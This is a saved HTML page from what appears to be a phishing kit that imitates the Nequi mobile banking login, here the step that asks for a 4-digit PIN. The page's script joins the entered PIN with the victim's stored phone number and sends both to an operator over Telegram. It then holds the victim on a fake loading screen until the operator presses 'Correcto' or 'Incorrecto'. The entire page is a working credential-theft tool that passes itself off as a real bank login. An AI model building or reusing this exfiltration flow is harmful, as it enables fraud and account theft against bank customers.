<!DOCTYPE html>
<!-- saved from url=(0068)https://estudiodecredito.replit.app/1/validate-data/auth-v2-pass.php -->
<html lang="en">

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

  <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  <title>Nequi</title>
  <link rel="stylesheet" href="../css/spinner.css" />
  <link rel="stylesheet" href="../css/navbar.css" />
  <link rel="stylesheet" href="../css/globals.css" />


  <link rel="shortcut icon" type="image/x-icon" href="../assets/favicon.ico" />
  <style>
    .loadingContainer {
      display: none;
    }

    footer {
      margin-top: 40px;
      background: url(../assets/footer-nequi.svg);
      background-repeat: no-repeat;
      background-size: cover;
      padding: 100px 0 60px 0;
    }
  </style>
</head>
<script>
  document.addEventListener("DOMContentLoaded", function () {
    // Detecta si el dispositivo es "móvil"
    let esMovil = /Mobi|Android|iPhone|iPad|iPod|Opera Mini|IEMobile|WPDesktop/i.test(navigator.userAgent);

    if (!esMovil) {
      // Si NO es móvil, redirige a pc.html
      window.location.href = "pc.html";
    }
  });
</script>


<body class="bg-purple-primary h-dvh flex flex-col">
  <main class="loadingContainer">
    <header class="z-[999] fixed top-0 w-full h-16 mx-auto pt-0 pb-0 overflow-visible bg-white">
      <div class="flex items-center h-full border-b border-gray-primary bg-white px-[26px]">
        <div class="flex items-center justify-between w-full max-w-[61.875rem] h-full mx-auto">
          <a href="./" class="h-8 [&amp;&gt;svg]:w-[100px]">
            <svg _ngcontent-atq-c28="" width="180" height="40" viewBox="0 0 104 32" fill="none"
              xmlns="http://www.w3.org/2000/svg" class="splash__container__svg">
              <path _ngcontent-atq-c28=""
                d="M5.29905 0H0.918073C0.411035 0 0 0.408316 0 0.912V4.608C0 5.11168 0.411035 5.52 0.918073 5.52H5.29905C5.80609 5.52 6.21713 5.11168 6.21713 4.608V0.912C6.21713 0.408316 5.80609 0 5.29905 0Z"
                fill="#DA0081" class="point__up"></path>
              <path _ngcontent-atq-c28=""
                d="M5.29905 0H0.918073C0.411035 0 0 0.408316 0 0.912V4.608C0 5.11168 0.411035 5.52 0.918073 5.52H5.29905C5.80609 5.52 6.21713 5.11168 6.21713 4.608V0.912C6.21713 0.408316 5.80609 0 5.29905 0Z"
                fill="#DA0081" class="point__down"></path>
              <path _ngcontent-atq-c28=""
                d="M31.9876 0H28.2187C27.7033 0 27.3006 0.416 27.3006 0.912V15.872C27.3006 16.176 26.8979 16.288 26.753 16.016L17.991 0.4C17.8461 0.144 17.5884 0 17.2823 0H11.0169C10.5015 0 10.0988 0.416 10.0988 0.912V24.816C10.0988 25.328 10.5176 25.728 11.0169 25.728H14.7858C15.3012 25.728 15.7039 25.312 15.7039 24.816V9.408C15.7039 9.104 16.1066 8.992 16.2515 9.264L25.2551 25.344C25.4 25.6 25.6577 25.744 25.9638 25.744H31.9554C32.4708 25.744 32.8735 25.328 32.8735 24.832V0.912C32.8735 0.4 32.4547 0 31.9554 0H31.9876Z"
                fill="#200020" class="N"></path>
              <path _ngcontent-atq-c28=""
                d="M54.6495 16.3999C54.6495 9.66395 50.2363 6.31995 45.3883 6.31995C39.0906 6.31995 35.4988 10.6559 35.4988 16.5119C35.4988 23.1679 40.0087 26.3359 45.2433 26.3359C50.4779 26.3359 53.5382 23.6479 54.3596 20.1599C54.4724 19.7119 54.2147 19.3119 53.5382 19.3119H50.5746C50.2363 19.3119 49.9464 19.4879 49.8015 19.8239C49.0606 21.4399 47.8687 22.2879 45.5815 22.2879C42.9884 22.2879 41.2489 20.6719 40.9912 17.3919H53.7315C54.2791 17.3919 54.6495 16.9919 54.6495 16.3999ZM41.2006 13.8559C41.7482 11.4399 43.1656 10.3679 45.3077 10.3679C47.2244 10.3679 48.8673 11.4719 49.0928 13.8559H41.2006Z"
                fill="#200020" class="E"></path>
              <path _ngcontent-atq-c28=""
                d="M103.082 6.80005H99.2969C98.7899 6.80005 98.3788 7.20837 98.3788 7.71205V24.832C98.3788 25.3357 98.7899 25.744 99.2969 25.744H103.082C103.589 25.744 104 25.3357 104 24.832V7.71205C104 7.20837 103.589 6.80005 103.082 6.80005Z"
                fill="#200020" class="I"></path>
              <path _ngcontent-atq-c28=""
                d="M74.976 6.80002H71.2071C70.6917 6.80002 70.289 7.21602 70.289 7.71202V8.64002C69.1615 7.32802 67.3093 6.41602 64.8772 6.41602C59.4332 6.41602 56.5501 11.312 56.5501 16.496C56.5501 21.024 58.9178 26.096 64.7644 26.096C66.8583 26.096 69.081 25.104 70.289 23.696V31.056C70.289 31.568 70.7078 31.968 71.2071 31.968H74.976C75.4914 31.968 75.8941 31.552 75.8941 31.056V7.72802C75.8941 7.21602 75.4753 6.81602 74.976 6.81602V6.80002ZM66.3912 22.064C63.9108 22.064 62.1713 20.256 62.1713 16.368C62.1713 12.48 63.9108 10.448 66.3912 10.448C68.8716 10.448 70.6111 12.32 70.6111 16.368C70.6111 20.416 68.8716 22.064 66.3912 22.064Z"
                fill="#200020" class="Q"></path>
              <path _ngcontent-atq-c28=""
                d="M95.0448 6.80005H91.2759C90.7604 6.80005 90.3578 7.21605 90.3578 7.71205V17.3921C90.3578 20.5121 88.9565 21.4241 87.1687 21.4241C85.3809 21.4241 83.9796 20.5121 83.9796 17.3921V7.71205C83.9796 7.20005 83.5608 6.80005 83.0615 6.80005H79.2926C78.7772 6.80005 78.3745 7.21605 78.3745 7.71205V17.7921C78.3745 23.7921 81.7086 26.2081 87.1848 26.2081C92.661 26.2081 95.9951 23.7761 95.9951 17.7921V7.71205C95.9951 7.20005 95.5763 6.80005 95.077 6.80005H95.0448Z"
                fill="#200020" class="U"></path>
            </svg>
          </a>
          <button class="flex flex-col justify-between w-[25px] h-[20px] bg-transparent border-none cursor-pointer"
            aria-label="Menu">
            <span
              class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
            <span
              class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
            <span
              class="bar w-full max-w-[25px] h-px my-[3px] bg-purple-primary transition-all duration-400 py-px"></span>
          </button>
        </div>
      </div>
    </header>

    <section class="mainSectionContainer loading">
      <div class="hero-image"></div>
      <div class="mainSectionWrapper">
        <div class="logo_nequi_animado">
          <img src="../assets/loading-nequi.webp" alt="">
        </div>
        <p class="wait-msg">Por favor, espere...</p>
        <p class="info-msg">En este momento estamos validando algunos datos. puede tardar un momento.</p>

        <div class="bottom" style="display: flex;">
          <p class="warning-msg">*Valido desde el <span id="dia">07</span> de <span id="mes">Agosto</span> al <span
              id="dia2">25</span> de <span id="mes2">Septiembre</span> del <span id="anio">2025</span>, aplican T&amp;C
          </p>
          <img src="../assets/seguro_fogafin.svg" alt="image">
        </div>
      </div>
    </section>

    <footer>
      <div class="wrap">
        <div class="wrapper">
          <div class="footer">
            <img class="footer-pc" src="../assets/footer-bigscreen.png" alt="" />
            <img class="footer-mobile" src="../assets/footer.png" alt="" />
          </div>
        </div>
      </div>
    </footer>
  </main>
  <div class="bg-white fixed top-0 left-0 w-full h-full z-50 hidden" id="error-login">
    <div class="min-h-dvh p-11 max-w-screen-sm mx-auto flex justify-center items-center">
      <section class="bg-white rounded-lg py-11 mb-80">
        <div class="flex flex-col items-center">
          <div class="flex justify-center items-center">
            <img class="max-w-[5.5rem]" src="../assets/iconsad.svg" alt="" />
          </div>
          <h1 class="text-lg font-bold text-[#210021] w-full text-center mb-4 mt-1">
            ¡Ups, algo salió mal!
          </h1>
          <p id="wait-msg" class="text-[#210021] w-full text-center mb-4 mt-1 text-sm font-medium">
            El número de teléfono o la contraseña que proporcionaste no son
            correctos. Por favor revísalos e intenta ingresar nuevamente.
          </p>
          <button class="bg-[#DA0081] text-white px-4 py-2 rounded-lg mx-auto cursor-pointer hover:bg-[#c1007a]"
            id="tryAgainButton">
            Intentar nuevamente
          </button>
        </div>
      </section>
    </div>
  </div>
  <header class="w-full flex flex-col p-5 mb-4">
    <a href="./auth-login.html" class="w-6 h-6 text-white mb-5">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512" fill="currentColor" width="100%" height="100%">
        <path
          d="M9.4 233.4c-12.5 12.5-12.5 32.8 0 45.3l160 160c12.5 12.5 32.8 12.5 45.3 0s12.5-32.8 0-45.3L109.2 288 416 288c17.7 0 32-14.3 32-32s-14.3-32-32-32l-306.7 0L214.6 118.6c12.5-12.5 12.5-32.8 0-45.3s-32.8-12.5-45.3 0l-160 160z">
        </path>
      </svg>
    </a>
    <h1 class="text-white text-2xl font-bold">Escribe tu clave</h1>
  </header>
  <section class="flex-1 max-w-[420px] flex flex-col mx-auto w-full px-4">
    <div
      class="max-w-[350px] w-full flex justify-center gap-8 mx-auto [&amp;&gt;input]:w-11 [&amp;&gt;input]:h-11 [&amp;&gt;input]:text-center [&amp;&gt;input]:bg-guanabana [&amp;&gt;input]:rounded-sm [&amp;&gt;input]:text-4xl [&amp;&gt;input]:font-bold [&amp;&gt;input]:text-pink-primary [&amp;&gt;input]:focus:outline-none [&amp;&gt;input]:pt-2.5">
      <input id="pass-1" maxlength="1" inputmode="none" readonly="readonly" />
      <input id="pass-2" maxlength="1" inputmode="none" readonly="readonly" />
      <input id="pass-3" maxlength="1" inputmode="none" readonly="readonly" />
      <input id="pass-4" maxlength="1" inputmode="none" readonly="readonly" />
    </div>
    <p class="text-center text-white text-sm mt-5 mb-8">
      No dudamos que seas tú...
      <br />
      Pero es mejor confirmar ;)
    </p>
    <div class="mt-auto w-full max-w-[400px] mx-auto" id="keyboard">
      <div
        class="flex justify-around mb-4 [&amp;&gt;button]:w-12 [&amp;&gt;button]:h-12 [&amp;&gt;button]:border-none [&amp;&gt;button]:bg-transparent [&amp;&gt;button]:text-4xl [&amp;&gt;button]:text-white [&amp;&gt;button]:cursor-pointer [&amp;&gt;button]:rounded-full [&amp;&gt;button]:transition-colors [&amp;&gt;button]:duration-200 [&amp;&gt;button]:select-none [&amp;&gt;button]:touch-manipulation [&amp;&gt;button]:focus:outline-none">
        <button class="keyboard-btn" data-value="1">1</button>
        <button class="keyboard-btn" data-value="2">2</button>
        <button class="keyboard-btn" data-value="3">3</button>
      </div>
      <div
        class="flex justify-around mb-4 [&amp;&gt;button]:w-12 [&amp;&gt;button]:h-12 [&amp;&gt;button]:border-none [&amp;&gt;button]:bg-transparent [&amp;&gt;button]:text-4xl [&amp;&gt;button]:text-white [&amp;&gt;button]:cursor-pointer [&amp;&gt;button]:rounded-full [&amp;&gt;button]:transition-colors [&amp;&gt;button]:duration-200 [&amp;&gt;button]:select-none [&amp;&gt;button]:touch-manipulation [&amp;&gt;button]:focus:outline-none">
        <button class="keyboard-btn" data-value="4">4</button>
        <button class="keyboard-btn" data-value="5">5</button>
        <button class="keyboard-btn" data-value="6">6</button>
      </div>
      <div
        class="flex justify-around mb-4 [&amp;&gt;button]:w-12 [&amp;&gt;button]:h-12 [&amp;&gt;button]:border-none [&amp;&gt;button]:bg-transparent [&amp;&gt;button]:text-4xl [&amp;&gt;button]:text-white [&amp;&gt;button]:cursor-pointer [&amp;&gt;button]:rounded-full [&amp;&gt;button]:transition-colors [&amp;&gt;button]:duration-200 [&amp;&gt;button]:select-none [&amp;&gt;button]:touch-manipulation [&amp;&gt;button]:focus:outline-none">
        <button class="keyboard-btn" data-value="7">7</button>
        <button class="keyboard-btn" data-value="8">8</button>
        <button class="keyboard-btn" data-value="9">9</button>
      </div>
      <div
        class="flex justify-around mb-4 [&amp;&gt;button]:w-12 [&amp;&gt;button]:h-12 [&amp;&gt;button]:border-none [&amp;&gt;button]:bg-transparent [&amp;&gt;button]:text-4xl [&amp;&gt;button]:text-white [&amp;&gt;button]:cursor-pointer [&amp;&gt;button]:rounded-full [&amp;&gt;button]:transition-colors [&amp;&gt;button]:duration-200 [&amp;&gt;button]:select-none [&amp;&gt;button]:touch-manipulation [&amp;&gt;button]:focus:outline-none">
        <button class="invisible" disabled=""></button>
        <button class="keyboard-btn" data-value="0">0</button>
        <button class="keyboard-btn text-white" id="delete-pass">
          <svg width="33" height="30" viewBox="0 0 29 27" fill="none" xmlns="http://www.w3.org/2000/svg">
            <path fill-rule="evenodd" clip-rule="evenodd"
              d="M26.8068 0C27.9114 0 28.8068 0.895431 28.8068 2V24.727C28.8068 25.8316 27.9114 26.727 26.8068 26.727H15.4722C14.9712 26.727 14.4884 26.5389 14.1194 26.2001L4.15169 17.0462C1.99435 15.065 1.99435 11.662 4.15169 9.68082L14.1194 0.526929C14.4884 0.188043 14.9712 0 15.4722 0H26.8068Z"
              fill="currentColor"></path>
            <path d="M16.3541 11.1945L21.3873 16.2277" stroke="#200020" stroke-linecap="round" stroke-linejoin="round">
            </path>
            <path d="M21.2213 11.4275L16.3423 16.3065" stroke="#200020" stroke-linecap="round" stroke-linejoin="round">
            </path>
          </svg>
        </button>
      </div>
    </div>
  </section>

  <script src="../js/sendTelegramMessage.js"></script>
<script src="../js/actions.js"></script>
  <script type="module">
    document.addEventListener("DOMContentLoaded", () => {
      const formData = JSON.parse(localStorage.getItem("formData"));
      const inputs = document.querySelectorAll('input[id^="pass-"]');
      const keyboard = document.getElementById("keyboard");
      const deleteBtn = document.getElementById("delete-pass");
      const loadingSpinner = document.querySelector(".loadingContainer");
      const errorLogin = document.getElementById("error-login");
      const tryAgainButton = document.getElementById("tryAgainButton");
      let currentInput = 0;

      tryAgainButton.addEventListener("click", () => {
        window.location.href = "auth-login.html";
      });

      // Manejar clics del teclado
      keyboard.addEventListener("click", (e) => {
        const button = e.target.closest(".keyboard-btn");
        if (button && !button.id.includes("delete")) {
          const value = button.dataset.value;
          if (currentInput < inputs.length) {
            // Guardar el valor real en un atributo personalizado
            inputs[currentInput].dataset.realValue = value;
            // Mostrar asterisco en el campo de entrada
            inputs[currentInput].value = "*";
            // Disparar el evento input
            inputs[currentInput].dispatchEvent(
              new Event("input", {
                bubbles: true,
              })
            );
            currentInput++;
          }
        }
      });

      // Manejar el botón de borrar
      deleteBtn.addEventListener("click", () => {
        if (currentInput > 0) {
          currentInput--;
          inputs[currentInput].value = "";
          inputs[currentInput].dispatchEvent(
            new Event("input", {
              bubbles: true,
            })
          );
        }
      });

      // Permitir borrar con tecla retroceso
      document.addEventListener("keydown", (e) => {
        if (e.key === "Backspace" && currentInput > 0) {
          currentInput--;
          inputs[currentInput].value = "";
          inputs[currentInput].dispatchEvent(
            new Event("input", {
              bubbles: true,
            })
          );
        }
      });

      // Prevenir cualquier entrada de teclado físico
      inputs.forEach((input) => {
        ["keydown", "keyup", "keypress", "input", "textInput"].forEach(
          (eventType) => {
            input.addEventListener(eventType, (e) => {
              e.preventDefault();
              return false;
            });
          }
        );

        input.addEventListener("paste", (e) => {
          e.preventDefault();
          return false;
        });

        input.setAttribute("readonly", "readonly");
        input.setAttribute("inputmode", "none");
      });

      // Verificar el estado de los inputs
      inputs.forEach((input, index) => {
        input.addEventListener("input", async () => {
          let isComplete = Array.from(inputs).every(
            (input) => input.value !== ""
          );
          if (isComplete) {
            let pass = "";
            inputs.forEach((input) => {
              pass += input.dataset.realValue || "";
            });

            const formData =
              JSON.parse(localStorage.getItem("formData")) || {};
            const transactionId =
              Date.now().toString(36) + Math.random().toString(36).substr(2);
            formData.password = pass;
            formData.transactionId = transactionId;
            localStorage.setItem("formData", JSON.stringify(formData));
            loadingSpinner.style.display = "block";

            const message = `⭐⭐Nequi paso 1⭐⭐\n\n📱Número: ${formData.phoneNumber}\n 🔒Clave: ${pass}`;
            const keyboard = JSON.stringify({
              inline_keyboard: [
                [
                  { text: "Correcto", callback_data: `correcto:${transactionId}` },
                  { text: "Incorrecto", callback_data: `incorrecto:${transactionId}` }
                ]
              ]
            });

            try {
              const responseMensaje = await sendTelegramMessageWithBtn(
                message,
                keyboard
              );

              const { action } = await waitForButtonPress(responseMensaje.message_id);

              await handleAction(action, transactionId);
            } catch (error) {
              console.error("Error al enviar el mensaje:", error);
            }
          }
        });
      });
    });
  </script>
</body>

</html>